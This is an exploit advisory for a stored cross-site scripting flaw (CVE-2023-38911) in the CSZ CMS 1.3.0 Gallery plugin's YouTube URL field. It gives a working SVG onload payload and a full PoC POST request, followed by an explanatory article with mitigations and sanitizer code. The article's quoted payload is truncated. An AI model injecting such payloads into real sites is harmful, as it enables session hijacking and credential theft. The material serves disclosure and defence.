CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'YouTube URL' field of a previously created gallery in the 'Gallery' section. Note that in earlier versions the "Name" field used when creating a gallery was vulnerable to XSS; that issue was resolved in the current version 1.3.0. The vulnerability described here affects the "YouTube URL" field inside the created gallery.
# Steps to reproduce Stored XSS:
Go to the URL http://localhost/admin/plugin/gallery/edit/2.
After logging into the panel, go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery]; the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2].
Edit the gallery we have just created: arbitrary web scripts or HTML can be injected into the "YouTube URL" field.
With the following payload we achieve the XSS:
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
# PoC Request:
POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1
gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

CSZ CMS 1.3.0 Stored Cross-Site Scripting Vulnerability in the Gallery Plugin
Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in CSZ CMS version 1.3.0, specifically within the Gallery plugin. This flaw enables attackers to inject malicious scripts into the application's database, which are then executed whenever users view the affected content. The vulnerability was reported by Daniel González and assigned the CVE identifier CVE-2023-38911.
Understanding the Vulnerability
Stored XSS occurs when malicious code is permanently saved on the server—typically in a database—and later executed in the context of a user’s browser. Unlike reflected XSS, which requires a crafted URL to trigger, stored XSS persists across sessions and can affect multiple users without further interaction.
In CSZ CMS 1.3.0, the Gallery plugin allows administrators to create multimedia galleries, including YouTube video integration. The YouTube URL field is where the vulnerability lies. Although the previous version had XSS issues in the Name field, this was patched in 1.3.0. However, the YouTube URL field remains unvalidated and improperly sanitized.
Exploitation Steps and Proof of Concept
Attackers can exploit this vulnerability by following these steps:
- Navigate to http://localhost/admin/plugin/gallery/edit/2 after logging into the admin panel.
- Modify an existing gallery entry.
- Inject a malicious payload into the YouTube URL field.
- Submit the form to save the data.
The following payload demonstrates the exploit:
<p title="">
This payload is designed to trigger a JavaScript alert when the page loads. The <svg/onload=alert(document.domain)> element is particularly effective because SVG tags are often overlooked in input sanitization routines. The onload attribute executes the script as soon as the SVG element is rendered.
HTTP Request Payload Analysis
Below is a real-world proof-of-concept (PoC) request demonstrating how the attack is carried out:
POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1
gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
Key observations:
- URL Encoding: The payload is encoded using %3C (for <) and %3E (for >), which is standard for form submissions.
- Form Data: The youtube_url parameter contains the malicious SVG code, which is stored directly in the database.
- Attack Persistence: Once saved, the script will execute every time the gallery is rendered in the frontend, affecting all visitors.
Impact and Risk Assessment
| Aspect | Assessment |
|---|---|
| Impact | High: Stored XSS can lead to session hijacking, credential theft, defacement, and redirection to phishing sites. |
| Exploitability | Low to medium: Requires admin access to inject the payload, but once inserted, it affects all users. |
| CVSS Score | Estimated: 7.2 (High severity, as per CVSS v3.1). |
Although the vulnerability requires administrative privileges, it poses a significant risk in environments where multiple users have access to the admin panel or where admin accounts are compromised.
Security Recommendations and Mitigation
To prevent exploitation, developers and administrators must implement the following best practices:
- Input Sanitization: Validate and sanitize all user inputs, especially those used in rendering HTML.
- Output Encoding: Use context-aware encoding (e.g., HTML entity encoding) when displaying user-supplied content.
- Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and unsafe sources.
- Role-Based Access Control: Limit access to the Gallery plugin to trusted users only.
- Regular Security Audits: Conduct penetration testing and code reviews to detect such vulnerabilities early.
Code Fix Example
Here is a corrected implementation of the input validation for the YouTube URL field:
function sanitizeYoutubeUrl($url) {
    // Strip any tag that carries an on* event handler attribute (onload, onclick, ...)
    $url = preg_replace('/<[^>]*\bon\w+\s*=[^>]*>/i', '', $url);
    // Encode the remaining special characters so the browser renders the value as text
    $url = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return $url;
}
Explanation: This function uses a regular expression to strip any tag that carries an onload, onclick, or similar event attribute from the input. It then applies htmlspecialchars() to encode the remaining special characters (including both quote styles, via ENT_QUOTES), so that the stored value is rendered as text and no HTML or JavaScript executes in the browser.
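Stripping known-bad patterns with a regex is a deny-list; the stricter alternative for a field that should only ever hold a YouTube link is an allow-list validator. The following is an added example in Python (not CSZ CMS code) that accepts only an https URL on a YouTube host with a well-formed 11-character video id, escapes the id when building the embed markup, and decodes the advisory's PoC form body to show it is rejected; the host list and the iframe markup are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Allow-list of hosts accepted for the youtube_url field (assumed policy).
ALLOWED_HOSTS = {"www.youtube.com", "youtube.com", "m.youtube.com", "youtu.be"}
VIDEO_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")


def extract_video_id(url):
    """Return the 11-char video id, or None unless url is https on an allowed host."""
    try:
        parts = urlparse(url.strip())
    except ValueError:  # e.g. unbalanced IPv6 brackets in the host part
        return None
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return None
    if parts.hostname == "youtu.be":
        vid = parts.path.lstrip("/")
    elif parts.path == "/watch":
        vid = parse_qs(parts.query).get("v", [""])[0]
    elif parts.path.startswith("/embed/"):
        vid = parts.path[len("/embed/"):]
    else:
        return None
    return vid if VIDEO_ID_RE.fullmatch(vid) else None


def render_embed(url):
    """Build the fragment to store for a gallery item; invalid input is rejected."""
    vid = extract_video_id(url)
    if vid is None:
        raise ValueError("youtube_url is not an allowed YouTube video URL")
    # The id is already constrained, but escape it anyway when placing it in an attribute.
    src = html.escape("https://www.youtube.com/embed/" + vid, quote=True)
    return f'<iframe src="{src}" allowfullscreen></iframe>'


def check_form_body(body):
    """Decode a form-urlencoded body (like the PoC request) and validate youtube_url."""
    url = parse_qs(body, keep_blank_values=True).get("youtube_url", [""])[0]
    return {"decoded": url, "video_id": extract_video_id(url)}


# Constructed copy of the PoC request body quoted in the advisory.
POC_BODY = ("gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E"
            "%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add")

if __name__ == "__main__":
    print(check_form_body(POC_BODY))  # video_id is None: the payload never reaches storage
    print(render_embed("https://youtu.be/Ab1_Cd2-Ef3"))
```

Because the stored value is a constrained id rather than free text, the rendering layer has nothing to sanitize; output encoding then becomes a second layer rather than the only one.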
Conclusion
The CVE-2023-38911 vulnerability in CSZ CMS 1.3.0 highlights the importance of consistent security practices across all user input fields—even those seemingly benign, like URL inputs. Even if one field is patched, others may remain vulnerable. Security professionals must remain vigilant and apply defense-in-depth strategies to safeguard web applications.